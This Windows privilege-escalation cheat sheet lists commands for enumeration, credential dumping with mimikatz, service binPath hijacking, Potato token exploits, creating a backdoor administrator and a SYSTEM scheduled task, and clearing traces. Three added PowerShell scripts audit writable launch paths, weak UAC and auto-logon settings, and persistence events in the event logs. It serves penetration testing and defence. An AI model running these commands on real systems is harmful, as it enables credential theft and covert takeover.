This article introduces privilege escalation methods on Windows systems, covering ten main areas: information gathering, credential harvesting, service and configuration vulnerabilities, autoruns and scheduled tasks, privilege escalation primitives, software vulnerabilities, registry and permission issues, token and process hijacking, privilege escalation automation tools, and persistence and cleanup. Each section lists specific commands and tools that help the user identify and exploit potential security weaknesses in a test environment in order to elevate system privileges. It is recommended to perform these operations in non-production environments to avoid risk to the system.
Usage: run the commands one at a time and record the output to analyze possible escalation paths. If further tools (e.g., PowerUp.ps1) are needed, load and execute them in PowerShell. It is recommended to operate in a test environment to avoid risks to production systems.
🧭 I. Information Gathering Phase
whoami → View current username and privilege level.
whoami /priv → List current user's privileges (e.g., SeImpersonatePrivilege).
hostname → Obtain hostname to identify the target system.
systeminfo → View OS version, patches, and architecture.
wmic qfe get Caption,Description,HotFixID,InstalledOn → Enumerate installed patches to find clues to unpatched CVEs.
set → Print environment variables (e.g., TEMP, PATH, USERNAME, etc.).
echo %USERNAME% && echo %USERDOMAIN% → Obtain current user and domain information.
net users → Enumerate local user accounts.
net localgroup administrators → List local administrator members.
ipconfig /all → Network interfaces, DNS, and gateway information.
route print → Routing table to identify potential jump hosts/segments.
netstat -ano → View listening ports and corresponding PIDs.
tasklist /svc → List running processes and their service mappings.
wmic service list brief → Quickly enumerate service status and startup accounts.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run → Find auto-start entries and paths that can be abused.
⚙️ II. Credential Harvesting
cmdkey /list → View saved credential entries on the system.
runas /savecred /user:Administrator cmd.exe → Test if saved credentials can be exploited (if available).
type %APPDATA%\Microsoft\Credentials\* → Check possible credential storage files.
findstr /si password *.txt *.ini *.config → Search for plaintext password traces in files.
reg query HKLM /f password /t REG_SZ /s → Search for plaintext password fields in the registry.
mimikatz.exe (sekurlsa::logonpasswords) → Extract plaintext passwords/hashes/tickets from LSASS (only within authorized scope).
🧱 III. Service Misconfiguration
sc qc <service_name> → View service binary path, startup account, and configuration.
icacls "C:\path\to\service.exe" → Check whether the service executable is writable by low-privileged users.
sc config <service_name> binPath= "C:\evil.exe" → Change the service's binary path (requires permissions; commonly used for persistence).
accesschk.exe -uws "Everyone" "C:\Program Files\..." → Check for writable directories and service folder permissions.
wmic service get name,startname,pathname → Bulk list services, their startup entities, and paths.
🧩 IV. Autoruns / Scheduled Tasks
schtasks /query /fo LIST /v → Enumerate scheduled tasks and invoked commands.
icacls "C:\path\to\task.exe" → Check whether the program invoked by a scheduled task can be modified.
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run → Enumerate user-level auto-start entries.
wmic startup get caption,command → View auto-start items and corresponding commands.
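Sections III and IV both come down to the same audit: does a low-privileged principal have write access to the file (or its directory) that a service or scheduled task launches, or is the launch path unquoted with spaces in it. The following PowerShell script is an added example, not part of the original cheat sheet or any of the tools it names; it performs that check across all services and scheduled tasks at once, which is what the manual icacls/accesschk commands above do one path at a time. It assumes Windows PowerShell 5.1 or PowerShell 7 on Windows 8/Server 2012 or later (for Get-ScheduledTask), an elevated session so every service and task is visible, and the list of "weak" principals in $WeakPrincipals is an assumption you may want to extend.

```powershell
# Added example (not from the original cheat sheet): audit every service binary and
# scheduled-task action for launch paths that a low-privileged user could tamper with.
# Assumes Windows PowerShell 5.1 or PowerShell 7 on Windows 8/2012 or later (for
# Get-ScheduledTask), run from an elevated prompt so all services and tasks are visible.

# Principals whose write access on a launch path counts as a finding (assumed list; extend as needed).
$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that let a principal replace, alter or delete the file or directory.
$WriteMask = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ExecutableFromCommandLine {
    # Pull the executable path out of a raw command line, quoted or unquoted.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = $CommandLine.Trim()
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) } else { return $null }
    }
    # Unquoted: take the shortest prefix ending in .exe so spaces inside the path are kept.
    $m = [regex]::Match($cmd, '^(.+?\.exe)\b', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cmd -split '\s+')[0]
}

function Get-WeakWriters {
    # Return the weak principals that hold write-type Allow rights on $Path.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if (($WeakPrincipals -contains $id) -and (($ace.FileSystemRights -band $WriteMask) -ne 0)) { $id }
    }
    return @($hits | Sort-Object -Unique)
}

function Get-WritableLaunchPath {
    # Collect launch command lines from services and scheduled tasks, then emit one
    # finding per path that is unquoted with spaces or writable by a weak principal.
    $targets = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; RunAs = $svc.StartName; CommandLine = $svc.PathName }
    }
    $targets += foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only Exec actions carry a command line; COM-handler actions have no Execute.
            if ($action.Execute) {
                [pscustomobject]@{ Kind = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"; RunAs = $task.Principal.UserId; CommandLine = "$($action.Execute) $($action.Arguments)" }
            }
        }
    }
    foreach ($t in $targets) {
        $exe = Get-ExecutableFromCommandLine $t.CommandLine
        if (-not $exe) { continue }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        $issues = @()
        if (-not $t.CommandLine.Trim().StartsWith('"') -and $exe.Contains(' ')) { $issues += 'unquoted path containing spaces' }
        $fileWriters = Get-WeakWriters $exe
        if ($fileWriters) { $issues += "file writable by $($fileWriters -join ', ')" }
        $dirWriters = Get-WeakWriters (Split-Path -Parent $exe)
        if ($dirWriters) { $issues += "directory writable by $($dirWriters -join ', ')" }
        if ($issues) {
            [pscustomobject]@{ Kind = $t.Kind; Name = $t.Name; RunAs = $t.RunAs; Path = $exe; Issues = ($issues -join '; ') }
        }
    }
}

Get-WritableLaunchPath | Format-Table -AutoSize
```

Every row in the output is a path that should be fixed by quoting the path in the service or task definition and tightening the ACL so only Administrators and SYSTEM can write; a service running as LocalSystem whose binary or folder is writable by BUILTIN\Users is the exact condition the sc config / icacls commands above are looking for.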
🧨 V. Privilege Escalation Primitives
whoami /priv → Confirm if high-risk privileges exist (e.g., SeImpersonate, SeAssignPrimaryToken).
PrintSpoofer.exe -i -c cmd → Attempt privilege escalation using SeImpersonatePrivilege (if present).
JuicyPotato.exe -t * -p cmd.exe -l 1337 → Escalate via RPC/COM (for older systems/misconfigurations).
GodPotato.exe -cmd "cmd.exe" → Privilege escalation attempt available for newer systems (depending on environment).
🧰 VI. Software Exploitation
wmic product get name,version → List installed programs and versions to cross-reference with vulnerability databases.
dir "C:\\Program Files" → Manually identify potentially insecure third-party software.
findstr /si "install" *.log *.txt → Search installation logs for leaked credentials or path information.
Match versions against CVE/ExploitDB/vendor advisories → Turn known vulnerabilities into an executable exploit chain.
🗝️ VII. Registry Abuse
reg query HKLM\System\CurrentControlSet\Services → Find service registry keys that can be modified.
icacls C:\Windows\System32 → Check for permission anomalies in critical system directories.
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System → Check UAC/policy configuration.
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon → Check auto-logon configuration such as AutoAdminLogon.
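The two Policies\System and Winlogon queries above return a handful of values whose meaning is easy to misread in raw reg output. The following PowerShell function is an added example, not part of the original cheat sheet; it reads those values and reports only the settings that weaken the host. It assumes an elevated Windows PowerShell 5.1 or PowerShell 7 session; the value names are the documented Microsoft ones, and the "weak" thresholds are the Microsoft defaults for a hardened client.

```powershell
# Added example (not from the original cheat sheet): read the UAC and Winlogon values
# queried above and report the settings that weaken the system. Assumes an elevated
# Windows PowerShell 5.1 / PowerShell 7 session; thresholds follow the Microsoft defaults.

function Get-RegValue {
    # Return a single registry value, or $null when the key or value does not exist.
    param([string]$Key, [string]$Name)
    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-WeakLogonPolicy {
    $uac   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $logon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $findings = @()

    # UAC: EnableLUA=0 turns UAC off; ConsentPromptBehaviorAdmin=0 elevates admins silently;
    # LocalAccountTokenFilterPolicy=1 gives local admin accounts a full token over the network.
    if ((Get-RegValue $uac 'EnableLUA') -eq 0) {
        $findings += 'EnableLUA=0: UAC is disabled, every administrator logon runs fully elevated.'
    }
    if ((Get-RegValue $uac 'ConsentPromptBehaviorAdmin') -eq 0) {
        $findings += 'ConsentPromptBehaviorAdmin=0: administrators elevate without any prompt.'
    }
    if ((Get-RegValue $uac 'LocalAccountTokenFilterPolicy') -eq 1) {
        $findings += 'LocalAccountTokenFilterPolicy=1: remote logons with local admin accounts get an unfiltered token.'
    }

    # Winlogon: AutoAdminLogon=1 logs on automatically at boot; DefaultPassword keeps the
    # password in clear text in the registry (the value is a REG_SZ, hence the string compare).
    if ("$(Get-RegValue $logon 'AutoAdminLogon')" -eq '1') {
        $user = Get-RegValue $logon 'DefaultUserName'
        $findings += "AutoAdminLogon=1: the host logs on automatically as '$user'."
        if ($null -ne (Get-RegValue $logon 'DefaultPassword')) {
            $findings += 'DefaultPassword is set: the auto-logon password is readable from the registry.'
        }
    }

    if ($findings.Count -eq 0) { $findings += 'No weak UAC or auto-logon settings found.' }
    return $findings
}

Test-WeakLogonPolicy
```

A missing value is treated as the secure default (UAC on, no auto-logon), which matches how Windows behaves when the value is absent; the function only reports, it does not change anything, so it is safe to run as a recurring compliance check.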
🕵️ VIII. Token & Process Hijacking
whoami /groups → View current user's group memberships and available tokens.
tasklist /fi "username eq SYSTEM" → Find SYSTEM-level processes to assess token theft opportunities.
psexec.exe -s cmd.exe → Use PsTools to run commands locally with SYSTEM privileges (requires executable permissions).
Use Process Explorer for visual token/handle analysis → Find process tokens that can be borrowed.
🧿 IX. Automation Tools
winPEASx64.exe → Automatically enumerate potential privilege escalation vectors and misconfigurations.
Seatbelt.exe → Quickly gather system security and configuration information.
PowerUp.ps1 → PowerShell-scripted privilege escalation checks.
SharpUp.exe → C# version of privilege escalation checks, suitable for red team/internal network scenarios.
PrivescCheck.ps1 → Comprehensive PowerShell privilege escalation scan.
🔥 X. Persistence & Cleanup
net user backdoor P@ssw0rd /add → Create a backdoor user (note compliance and authorization).
net localgroup administrators backdoor /add → Add the backdoor user to the administrators group.
schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\proof.txt" /sc onlogon /ru SYSTEM → Create a persistent scheduled task running as SYSTEM.
del /f /q C:\Windows\Temp\* → Clean up traces (operate with caution, record audit actions).
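Each of the persistence commands in this section leaves a record in the Windows event logs: net user writes 4720, net localgroup ... /add writes 4732, schtasks /create writes 4698, and a service installed through sc create writes 4697 in the Security log and 7045 in the System log. The following PowerShell script is an added example, not part of the original cheat sheet; it collects those records from the last N hours and summarises who did what, which is the check a defender (or the tester writing the report) runs after the cleanup step. It assumes an elevated Windows PowerShell 5.1 or PowerShell 7 session and that the Account Management, Other Object Access Events and Security System Extension audit subcategories are enabled; 7045 is logged by the Service Control Manager regardless of audit policy.

```powershell
# Added example (not from the original cheat sheet): collect the Windows event log records
# that the persistence commands above leave behind and summarise them for review.
# Security log: 4720 (user created), 4732 (member added to a local group), 4698 (scheduled
# task created), 4697 (service installed). System log: 7045 (service installed, from SCM).
# Assumes an elevated Windows PowerShell 5.1 / PowerShell 7 session and that the Account
# Management, Other Object Access Events and Security System Extension audit subcategories
# are enabled; without them the Security log has nothing to find.

function ConvertFrom-EventData {
    # Flatten the <EventData><Data Name="..."> elements of an event into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    return $data
}

function Resolve-Sid {
    # Best-effort SID to account-name translation; falls back to the raw SID.
    param([string]$Sid)
    try {
        return (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate([System.Security.Principal.NTAccount]).Value
    } catch { return $Sid }
}

function Get-PersistenceEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $security = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732, 4698, 4697; StartTime = $since } -ErrorAction SilentlyContinue
    $system   = Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue

    foreach ($e in @($security) + @($system)) {
        if ($null -eq $e) { continue }   # an empty query yields a single $null element
        $d = ConvertFrom-EventData $e
        $detail = switch ($e.Id) {
            4720 { "local account '$($d.TargetUserName)' created" }
            4732 { "$(Resolve-Sid $d.MemberSid) added to group '$($d.TargetUserName)'" }
            4698 {
                # The full task definition XML is embedded in the event; pull the command it runs.
                $cmd = [regex]::Match("$($d.TaskContent)", '<Command>([^<]*)</Command>').Groups[1].Value
                "scheduled task '$($d.TaskName)' created, runs: $cmd"
            }
            4697 { "service '$($d.ServiceName)' installed, binary: $($d.ServiceFileName)" }
            7045 { "service '$($d.ServiceName)' installed, binary: $($d.ImagePath), account: $($d.AccountName)" }
        }
        [pscustomobject]@{
            Time   = $e.TimeCreated
            Id     = $e.Id
            Actor  = $(if ($d.ContainsKey('SubjectUserName')) { $d.SubjectUserName } else { '(Service Control Manager)' })
            Detail = $detail
        }
    }
}

Get-PersistenceEvents -Hours 24 | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Run with a window that covers the test (for example -Hours 48) and compare the rows against the commands that were actually issued: a 4732 adding an account to Administrators or a 4698 whose task runs under SYSTEM with a command in a user-writable location is what the earlier sections of this sheet set out to create, and it is also what the cleanup line cannot remove, since del only touches files, not the event log.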